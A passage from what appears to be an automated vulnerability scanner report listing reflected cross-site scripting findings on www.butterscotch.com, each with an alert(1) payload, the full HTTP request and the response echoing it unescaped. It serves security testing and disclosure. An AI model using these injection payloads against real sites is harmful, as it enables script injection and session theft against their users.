HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:04 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=ccd093b6fe737b0f8d76bc785a9d9d9f; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ccd093b6fe737b0f8d76bc785a9d9d9f=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50632

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/shows/Miss-Download86263'><script>alert(1)</script>484a3c8edc8' />
...[SNIP]...

1.13. http://www.butterscotch.com/shows/Miss-Download [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/Miss-Download

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26605"-alert(1)-"689bed10a7d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shows/Miss-Download26605"-alert(1)-"689bed10a7d HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=41305656fdf4b89151e629d558c5966a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 41305656fdf4b89151e629d558c5966a=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50648

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<script>
WS_AJAX = "http://www.butterscotch.com/includes/ajax/";

   loggedIn    = false;
   

topTab = 'sho';
url = "http://www.butterscotch.com/shows/Miss-Download26605"-alert(1)-"689bed10a7d";

</script>
...[SNIP]...

1.14. http://www.butterscotch.com/shows/Miss-Download [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/Miss-Download

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddabd"><script>alert(1)</script>d590b6c1636 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/Miss-Downloadddabd"><script>alert(1)</script>d590b6c1636 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=9135b2838d5782046085771f61f8a4c8; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 9135b2838d5782046085771f61f8a4c8=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50632

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type=hidden name=ref value="http://www.butterscotch.com/shows/Miss-Downloadddabd"><script>alert(1)</script>d590b6c1636" />
...[SNIP]...

1.15. http://www.butterscotch.com/shows/Mr-Mobile [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/Mr-Mobile

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfea8"-alert(1)-"554ac61bd4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shows/Mr-Mobilebfea8"-alert(1)-"554ac61bd4e HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4ec4e58dabe0a58f5b01a43ede0e3cd4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4ec4e58dabe0a58f5b01a43ede0e3cd4=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50507

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<script>
WS_AJAX = "http://www.butterscotch.com/includes/ajax/";

   loggedIn    = false;
   

topTab = 'sho';
url = "http://www.butterscotch.com/shows/Mr-Mobilebfea8"-alert(1)-"554ac61bd4e";

</script>
...[SNIP]...

1.16. http://www.butterscotch.com/shows/Mr-Mobile [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/Mr-Mobile

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49459"><script>alert(1)</script>6537b84f503 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/Mr-Mobile49459"><script>alert(1)</script>6537b84f503 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:04 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=0bd061f798757be20d5c10cb889c32c0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 0bd061f798757be20d5c10cb889c32c0=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50452

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type=hidden name=ref value="http://www.butterscotch.com/shows/Mr-Mobile49459"><script>alert(1)</script>6537b84f503" />
...[SNIP]...

1.17. http://www.butterscotch.com/shows/Mr-Mobile [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/Mr-Mobile

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b7b6d'><script>alert(1)</script>031da9bdfb8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/Mr-Mobileb7b6d'><script>alert(1)</script>031da9bdfb8 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=ae2fcd6fdc468bd08f7f3e164698ee04; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ae2fcd6fdc468bd08f7f3e164698ee04=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50437

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/shows/Mr-Mobileb7b6d'><script>alert(1)</script>031da9bdfb8' />
...[SNIP]...

1.18. http://www.butterscotch.com/shows/On-Deck [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/On-Deck

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a2be"><script>alert(1)</script>0cc37f18b7a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/On-Deck9a2be"><script>alert(1)</script>0cc37f18b7a HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=2190b7470bec9191f7a3b7fb33cc4ced; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2190b7470bec9191f7a3b7fb33cc4ced=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50578

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type=hidden name=ref value="http://www.butterscotch.com/shows/On-Deck9a2be"><script>alert(1)</script>0cc37f18b7a" />
...[SNIP]...

1.19. http://www.butterscotch.com/shows/On-Deck [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/On-Deck

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ab27"-alert(1)-"9bc82b719cd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shows/On-Deck7ab27"-alert(1)-"9bc82b719cd HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=70c896269b3f0eef2dff476cbdc7ddf4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 70c896269b3f0eef2dff476cbdc7ddf4=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50380

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<script>
WS_AJAX = "http://www.butterscotch.com/includes/ajax/";

   loggedIn    = false;
   

topTab = 'sho';
url = "http://www.butterscotch.com/shows/On-Deck7ab27"-alert(1)-"9bc82b719cd";

</script>
...[SNIP]...

1.20. http://www.butterscotch.com/shows/On-Deck [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/On-Deck

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d5fe3'><script>alert(1)</script>2aec528306 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/On-Deckd5fe3'><script>alert(1)</script>2aec528306 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=aaedf1562ad27fe7dbffc58ae5c56f87; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: aaedf1562ad27fe7dbffc58ae5c56f87=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50588

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/shows/On-Deckd5fe3'><script>alert(1)</script>2aec528306' />
...[SNIP]...

1.21. http://www.butterscotch.com/shows/The-Noob [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/The-Noob

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 756bb"-alert(1)-"c84622db6bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shows/The-Noob756bb"-alert(1)-"c84622db6bd HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=f615d29a7e5ec5d4974871af0bcf1182; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f615d29a7e5ec5d4974871af0bcf1182=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50341

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<script>
WS_AJAX = "http://www.butterscotch.com/includes/ajax/";

   loggedIn    = false;
   

topTab = 'sho';
url = "http://www.butterscotch.com/shows/The-Noob756bb"-alert(1)-"c84622db6bd";

</script>
...[SNIP]...

1.22. http://www.butterscotch.com/shows/The-Noob [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/The-Noob

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b3d86'><script>alert(1)</script>b1ffded8566 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/The-Noobb3d86'><script>alert(1)</script>b1ffded8566 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=550a29db4533d9b4bb7330a8ad3d7e8f; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 550a29db4533d9b4bb7330a8ad3d7e8f=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50416

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/shows/The-Noobb3d86'><script>alert(1)</script>b1ffded8566' />
...[SNIP]...

1.23. http://www.butterscotch.com/shows/The-Noob [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/The-Noob

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a634"><script>alert(1)</script>ec3897212c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/The-Noob3a634"><script>alert(1)</script>ec3897212c8 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=1cc6f27e893df95ce1bafcfc9a13f70c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 1cc6f27e893df95ce1bafcfc9a13f70c=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50414

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type=hidden name=ref value="http://www.butterscotch.com/shows/The-Noob3a634"><script>alert(1)</script>ec3897212c8" />
...[SNIP]...

1.24. http://www.butterscotch.com/tutorials.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /tutorials.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d7c85'><script>alert(1)</script>bc9e9d0f84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tutorials.html?d7c85'><script>alert(1)</script>bc9e9d0f84=1 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=50028f24a02248e8a3ad46b9ac8bedf4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 50028f24a02248e8a3ad46b9ac8bedf4=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 56587

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/tutorials.html?d7c85'><script>alert(1)</script>bc9e9d0f84=1' />
...[SNIP]...

1.25. http://www.butterscotch.com/tutorials.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /tutorials.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c73a3"-alert(1)-"3ae1549e395 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tutorials.html?c73a3"-alert(1)-"3ae1549e395=1 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
